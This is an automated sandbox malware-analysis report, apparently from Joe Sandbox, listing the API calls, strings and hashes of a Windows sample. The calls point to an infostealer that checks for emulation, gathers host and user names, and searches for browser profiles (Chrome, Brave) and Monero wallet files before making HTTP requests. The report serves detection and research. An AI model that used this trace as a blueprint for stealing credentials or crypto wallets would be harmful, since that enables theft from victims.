                  • Instruction Fuzzy Hash: 9C016DB0D40308BBEF10DBE0CC89B9EBB7CAB44701F248058EB05BA2C0DB74A5418BD9

                  Control-flow Graph (rendered graph with executed / not-executed node colouring; image not reproduced)
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015E9C18,?,009C110C,?,00000000,?,009C1110,?,00000000,009C0AEF), ref: 009B6ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 009B6AE8
                  • CloseHandle.KERNEL32(00000000), ref: 009B6AF9
                  • Sleep.KERNEL32(00001770), ref: 009B6B04
                  • CloseHandle.KERNEL32(?,00000000,?,015E9C18,?,009C110C,?,00000000,?,009C1110,?,00000000,009C0AEF), ref: 009B6B1A
                  • ExitProcess.KERNEL32 ref: 009B6B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: 308502a5ae055f62a8d5b6da4411478920dbc2f461e6ae477704eb65772bfb58
                  • Instruction ID: fdf6ab676d6fecce95d29d6e1ef6c02bd586e6656cdf98f2b9c9ad00feb3ecb0
                  • Opcode Fuzzy Hash: 308502a5ae055f62a8d5b6da4411478920dbc2f461e6ae477704eb65772bfb58
                  • Instruction Fuzzy Hash: CEF05E70944219AFEB00EBA0DE46BFD7B38EB44B21F104915B502E61C1CFB87940D666

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009A4839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 009A4849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: 1e1dd1fee5babfc83a48237098a638770c60024f471cc0cfb32fd61580b715ca
                  • Instruction ID: 44841987e6f711413f14f0b7701e6dd5a23d8a54972167842e6ca662dcb1d743
                  • Opcode Fuzzy Hash: 1e1dd1fee5babfc83a48237098a638770c60024f471cc0cfb32fd61580b715ca
                  • Instruction Fuzzy Hash: A5215EB1D00208ABDF10DFA4E845BDE7B79FB44320F108625F915A7280EB706A05CB91

                  Control-flow Graph

                  APIs
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A6280: InternetOpenA.WININET(009C0DFE,00000001,00000000,00000000,00000000), ref: 009A62E1
                    • Part of subcall function 009A6280: StrCmpCA.SHLWAPI(?,015EF828), ref: 009A6303
                    • Part of subcall function 009A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009A6335
                    • Part of subcall function 009A6280: HttpOpenRequestA.WININET(00000000,GET,?,015EEEA8,00000000,00000000,00400100,00000000), ref: 009A6385
                    • Part of subcall function 009A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009A63BF
                    • Part of subcall function 009A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009A63D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009B5228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 72845e8a4bb9aac63583a124a699ef06fe2eedc09dd67ec3dab495e5f967a924
                  • Instruction ID: 4180961f3d9006c4189c5e343a2a0558ed92c013896e5771df74614fccf53948
                  • Opcode Fuzzy Hash: 72845e8a4bb9aac63583a124a699ef06fe2eedc09dd67ec3dab495e5f967a924
                  • Instruction Fuzzy Hash: FC11FE30910148BBDB14FF64DE92BED7778AF90310F404558F91A5A592EF34AB05C696
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 009A112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 009A1132
                  • ExitProcess.KERNEL32 ref: 009A1143
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: 75d982521c8e552f924b96fd98020199defdd6d64530a40bc08b0e980fa511d2
                  • Instruction ID: 445a0b3acbdeffd9580236a4773398550f1a12b122f08044ad821293588398fe
                  • Opcode Fuzzy Hash: 75d982521c8e552f924b96fd98020199defdd6d64530a40bc08b0e980fa511d2
                  • Instruction Fuzzy Hash: A8E0E674945348FFE750ABA09C4AB097A7CAB05B01F104154F7097B1D0DAB53A409699
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009A10B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009A10F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: c5efa234a4879ed3b70f69f69710f0d12a19d20bc1d8778a8a6cbcd488348102
                  • Instruction ID: ca92be23afa76cd86921ab9320ca1223eacd10eaa771c69e3615377494d240d3
                  • Opcode Fuzzy Hash: c5efa234a4879ed3b70f69f69710f0d12a19d20bc1d8778a8a6cbcd488348102
                  • Instruction Fuzzy Hash: 22F0E271641218BBEB149AA4AC99FABB7ECE705B15F300848F504E7280D971AE00CAA0
                  APIs
                    • Part of subcall function 009B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B7910
                    • Part of subcall function 009B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 009B7917
                    • Part of subcall function 009B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 009B792F
                    • Part of subcall function 009B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009A11B7), ref: 009B7880
                    • Part of subcall function 009B7850: RtlAllocateHeap.NTDLL(00000000), ref: 009B7887
                    • Part of subcall function 009B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 009B789F
                  • ExitProcess.KERNEL32 ref: 009A11C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: d7e60fb8fa6f20c7f0d61e9bc430a0fabbabc737935c3bb88384fb83e0569bd6
                  • Instruction ID: 35995eb6e7653653b944b86f1eb5723c6f58f9e1bd4e0bdb4c2a16454a0bae9b
                  • Opcode Fuzzy Hash: d7e60fb8fa6f20c7f0d61e9bc430a0fabbabc737935c3bb88384fb83e0569bd6
                  • Instruction Fuzzy Hash: F3E012B591430157CA0073F0AD8BB6B369C5B95395F040524FA09D7102FE25F801C5A6
                  APIs
                  • wsprintfA.USER32 ref: 009B38CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 009B38E3
                  • lstrcat.KERNEL32(?,?), ref: 009B3935
                  • StrCmpCA.SHLWAPI(?,009C0F70), ref: 009B3947
                  • StrCmpCA.SHLWAPI(?,009C0F74), ref: 009B395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009B3C67
                  • FindClose.KERNEL32(000000FF), ref: 009B3C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: ec4aeba9a37e171705a9923dd4519fdf5f41137b6874b919ba78b64ce6b7e5c1
                  • Instruction ID: e719a2ff22b1b35e920b04fa9060a2edda717ae926405e67a2d2fee376e457c6
                  • Opcode Fuzzy Hash: ec4aeba9a37e171705a9923dd4519fdf5f41137b6874b919ba78b64ce6b7e5c1
                  • Instruction Fuzzy Hash: BFA131B1A00258ABDB24DFA4DD85FEE777CBB89300F048588B54D97141EB75AB84CF62
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • FindFirstFileA.KERNEL32(00000000,?,009C0B32,009C0B2B,00000000,?,?,?,009C13F4,009C0B2A), ref: 009ABEF5
                  • StrCmpCA.SHLWAPI(?,009C13F8), ref: 009ABF4D
                  • StrCmpCA.SHLWAPI(?,009C13FC), ref: 009ABF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009AC7BF
                  • FindClose.KERNEL32(000000FF), ref: 009AC7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: 9f2cc3c5454a121e8a6d02ad2a69058aecb1fca292b6357af731e28c494dabd0
                  • Instruction ID: 4d4003f91d6523ca0394b074e43bd95da2ef886552d9de8d91519d7c570a2c81
                  • Opcode Fuzzy Hash: 9f2cc3c5454a121e8a6d02ad2a69058aecb1fca292b6357af731e28c494dabd0
                  • Instruction Fuzzy Hash: 53425172900108ABDB14FB70DE96FED737DAFD4310F404558B90AA7191EE34AB49CBA6
                  APIs
                  • wsprintfA.USER32 ref: 009B492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 009B4943
                  • StrCmpCA.SHLWAPI(?,009C0FDC), ref: 009B4971
                  • StrCmpCA.SHLWAPI(?,009C0FE0), ref: 009B4987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009B4B7D
                  • FindClose.KERNEL32(000000FF), ref: 009B4B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: 5f70d62fb2296c192c97f2393b82dd16f06579f312725ebabf4e191dca7c0d24
                  • Instruction ID: eb993848b532dbec467d967133742572d8731770505d810923e8a1df5c60f76d
                  • Opcode Fuzzy Hash: 5f70d62fb2296c192c97f2393b82dd16f06579f312725ebabf4e191dca7c0d24
                  • Instruction Fuzzy Hash: 5E6135B5900218ABCB24EFA0DD85FEA77BCBB88701F04458CB60996141EF75EB85CF91
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009B4580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B4587
                  • wsprintfA.USER32 ref: 009B45A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 009B45BD
                  • StrCmpCA.SHLWAPI(?,009C0FC4), ref: 009B45EB
                  • StrCmpCA.SHLWAPI(?,009C0FC8), ref: 009B4601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009B468B
                  • FindClose.KERNEL32(000000FF), ref: 009B46A0
                  • lstrcat.KERNEL32(?,015EF678), ref: 009B46C5
                  • lstrcat.KERNEL32(?,015EE3C8), ref: 009B46D8
                  • lstrlen.KERNEL32(?), ref: 009B46E5
                  • lstrlen.KERNEL32(?), ref: 009B46F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: f79e7ff0839e569b5b5341b2d12c6a7e1aed7ae3564ebbc32522584a8fa7a377
                  • Instruction ID: 52aaa3144b8f6cbe13a7ed586b6b19b9c50faf37488f28eb3457886024eeb0af
                  • Opcode Fuzzy Hash: f79e7ff0839e569b5b5341b2d12c6a7e1aed7ae3564ebbc32522584a8fa7a377
                  • Instruction Fuzzy Hash: 065145B5900218ABCB24EB70DDC9FED777CAB98710F404588B60997191EF74AB84CF92
                  APIs
                  • wsprintfA.USER32 ref: 009B3EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 009B3EDA
                  • StrCmpCA.SHLWAPI(?,009C0FAC), ref: 009B3F08
                  • StrCmpCA.SHLWAPI(?,009C0FB0), ref: 009B3F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009B406C
                  • FindClose.KERNEL32(000000FF), ref: 009B4081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 01c74a1bc4929f8e3f9baf39aadd99d26319026217bf5401817c1d4ec35faac9
                  • Instruction ID: 41cef1315376683bd6b3300f6414a0a243f6eed297acad1b1b88660a10084960
                  • Opcode Fuzzy Hash: 01c74a1bc4929f8e3f9baf39aadd99d26319026217bf5401817c1d4ec35faac9
                  • Instruction Fuzzy Hash: 235143B6900218ABCB24EBB0DD85FEA737CBB98300F40458CB65996140DF75EB85CF91
                  APIs
                  • wsprintfA.USER32 ref: 009AED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 009AED55
                  • StrCmpCA.SHLWAPI(?,009C1538), ref: 009AEDAB
                  • StrCmpCA.SHLWAPI(?,009C153C), ref: 009AEDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009AF2AE
                  • FindClose.KERNEL32(000000FF), ref: 009AF2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: b69fd6c463ed8ae623f9697b743be0baf87b5be7dc5b19aa990c9d03a68b8ffb
                  • Instruction ID: 12c9f9693f81b495fa0edde4a27bd82fb058af56bd88d1ee517a0a8ed5172320
                  • Opcode Fuzzy Hash: b69fd6c463ed8ae623f9697b743be0baf87b5be7dc5b19aa990c9d03a68b8ffb
                  • Instruction Fuzzy Hash: 6DE1E7719111186AEB64FB60CD91FEE733CAF94710F4041D9B50A62492EF306F8ACF96
                  APIs
